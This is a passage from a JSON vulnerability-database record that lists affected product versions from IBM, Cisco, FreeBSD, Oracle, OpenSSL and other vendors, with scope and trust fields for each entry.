      {
        "model": "security identity manager virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.3"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70000"
      },
      {
        "model": "unified series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "78000"
      },
      {
        "model": "project openssl 1.0.1g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.4"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.1"
      },
      {
        "model": "10.1-release-p17",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "cloud manager with openstack interim fix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.5"
      },
      {
        "model": "project openssl 1.0.1i",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.4.2"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0"
      },
      {
        "model": "security identity manager virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.2"
      },
      {
        "model": "unified attendant console advanced",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1"
      },
      {
        "model": "10.2-release-p9",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "10.1-release-p27",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "telepresence tx series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "90000"
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10000"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "mq light client module for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.2014090800"
      },
      {
        "model": "10.2-release-p6",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "cloud manager with openstack interix fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.3"
      },
      {
        "model": "unified attendant console premium edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "real-time compression appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.2.17"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.7"
      },
      {
        "model": "mediasense",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "prime optical for sps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "pureapplication system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1"
      },
      {
        "model": "cognos tm1 interim fix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1.2"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.3"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3.0.0"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.1"
      },
      {
        "model": "business process manager express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.5"
      },
      {
        "model": "cognos insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0.1"
      },
      {
        "model": "tivoli provisioning manager for images",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.19"
      },
      {
        "model": "anyres live",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.3"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "unified attendant console business edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "9.3-release-p36",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "cloud manager with openstack interim fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.5"
      },
      {
        "model": "powerkvm sp3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.1"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.14"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.2"
      },
      {
        "model": "powerkvm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.3"
      },
      {
        "model": "mds series multilayer switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "90000"
      },
      {
        "model": "videoscape control suite foundation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.11"
      },
      {
        "model": "cognos insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "proventia network enterprise scanner",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.1"
      },
      {
        "model": "prime collaboration deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "cloud manager with openstack interim fix1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.6"
      },
      {
        "model": "9.3-release-p35",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "10.2-release-p10",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.19"
      },
      {
        "model": "rational developer for i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5.0.1"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "unified computing system b-series servers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rational developer for i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "infosphere master data management provider hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "watson explorer foundational components",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0.0.2"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "sdk for node.js",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.20"
      },
      {
        "model": "telepresence server on multiparty media",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3200"
      },
      {
        "model": "9.3-release-p2",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "9.3-stable",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "10.1-release-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "rational application developer for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.4"
      },
      {
        "model": "10.1-release-p9",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.1"
      },
      {
        "model": "project openssl 1.0.1c",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "smartcloud entry appliance fixpac",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0"
      },
      {
        "model": "project openssl 1.0.1f",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "datapower gateways",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.13"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.15"
      },
      {
        "model": "project openssl 1.0.2a",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "13000"
      },
      {
        "model": "tivoli provisioning manager for images",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.0"
      },
      {
        "model": "netezza diagnostics tools",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.1.2"
      },
      {
        "model": "powerkvm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.12"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.2"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "9.3-release-p3",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "telepresence system series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "30000"
      },
      {
        "model": "business process manager standard",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.7"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.1"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.3"
      },
      {
        "model": "cognos tm1 fix pack",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.26"
      },
      {
        "model": "sdk for node.js",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.10"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.19"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "cognos tm1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.0"
      },
      {
        "model": "project openssl 1.0.2d",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "intrusion prevention system solutions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.3.2"
      },
      {
        "model": "rational developer for aix and linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "cloud manager with openstack interim fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.4"
      },
      {
        "model": "tivoli provisioning manager for images build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.20280.6"
      },
      {
        "model": "9.3-release-p25",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.0"
      },
      {
        "model": "unified attendant console department edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.1"
      },
      {
        "model": "cognos tm1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.2"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60000"
      },
      {
        "model": "datapower gateways",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.10"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.1"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.2"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "cloupia unified infrastructure controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "enterprise session border controller ecz7.3m2p2",
        "scope": null,
        "trust": 0.3,
        "vendor": "oracle",
        "version": null
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.20"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.12"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "project openssl 1.0.1n",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "infosphere master data management standard/advanced edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.0"
      },
      {
        "model": "project openssl 1.0.1o",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "linux x86 64 -current",
        "scope": null,
        "trust": 0.3,
        "vendor": "slackware",
        "version": null
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "10.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.9.0.0"
      },
      {
        "model": "project openssl 1.0.2e",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "project openssl 1.0.1q",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "9.3"
      },
      {
        "model": "infosphere data explorer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5"
      },
      {
        "model": "agent desktop",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.9"
      },
      {
        "model": "email gateway",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.404"
      },
      {
        "model": "9.3-release-p21",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "9.3-release-p24",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "webex messenger service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.6"
      },
      {
        "model": "10.1-release-p19",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "cisco directors and switches with nx-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6.4"
      },
      {
        "model": "smartcloud entry appliance fixpac",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.5"
      },
      {
        "model": "10.1-release-p29",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "9.3-release-p13",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "nx-os nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "90000"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.9"
      },
      {
        "model": "powerkvm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.165.6"
      },
      {
        "model": "mobility services engine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified ip phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "89450"
      },
      {
        "model": "initiate master data service provider hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.10"
      },
      {
        "model": "smartcloud entry appliance fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.11"
      },
      {
        "model": "netezza diagnostics tools",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.1.1"
      },
      {
        "model": "infosphere master data management standard/advanced edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.3"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.1"
      },
      {
        "model": "email security appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "primavera p6 enterprise project portfolio management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "16.1"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.8"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.13"
      },
      {
        "model": "10.2-release-p11",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.6"
      },
      {
        "model": "business process manager express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.7"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5"
      },
      {
        "model": "mq light client module for node.js 1.0.2014091000-red",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2.0.0"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.0"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.18"
      },
      {
        "model": "9.3-release-p33",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.8"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6.2"
      },
      {
        "model": "jabber for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "10.2"
      },
      {
        "model": "smartcloud entry appliance fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.21"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.3"
      },
      {
        "model": "ethernet switch 40g 10g",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "642.0"
      },
      {
        "model": "telepresence video communication server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6"
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11000"
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "7"
      },
      {
        "model": "10.1-release-p25",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "ethernet switch 40g 10g",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "722.0"
      },
      {
        "model": "datapower gateways",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.6"
      },
      {
        "model": "rational developer for i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.9"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.7"
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.0.2"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5.0.0"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.4"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.6"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.13"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.4"
      },
      {
        "model": "project openssl 1.0.1m",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.1"
      },
      {
        "model": "expressway series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.2g",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "cisco directors and switches with nx-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.3.1"
      },
      {
        "model": "project openssl 1.0.2f",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.5"
      },
      {
        "model": "10.1-release-p6",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "model": "security identity manager virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.1.0"
      },
      {
        "model": "initiate master data service provider hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "edge digital media player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3000"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2"
      },
      {
        "model": "linux enterprise server sp4 ltss",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3x000"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.5"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "nx-os nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "50000"
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.0"
      },
      {
        "model": "project openssl 1.0.1j",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "solaris sru",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.36.5"
      },
      {
        "model": "oss support tools oracle explorer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "model": "unified attendant console standard",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rational developer for i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5.0.2"
      },
      {
        "model": "project openssl 1.0.1d",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security identity governance and intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2.1"
      },
      {
        "model": "telepresence server on multiparty media",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3100"
      },
      {
        "model": "9.3-release-p31",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "cloud manager with openstack interim fix1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.6"
      },
      {
        "model": "smartcloud entry appliance fixpac",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2"
      },
      {
        "model": "prime performance manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rational developer for aix and linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "prime collaboration provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
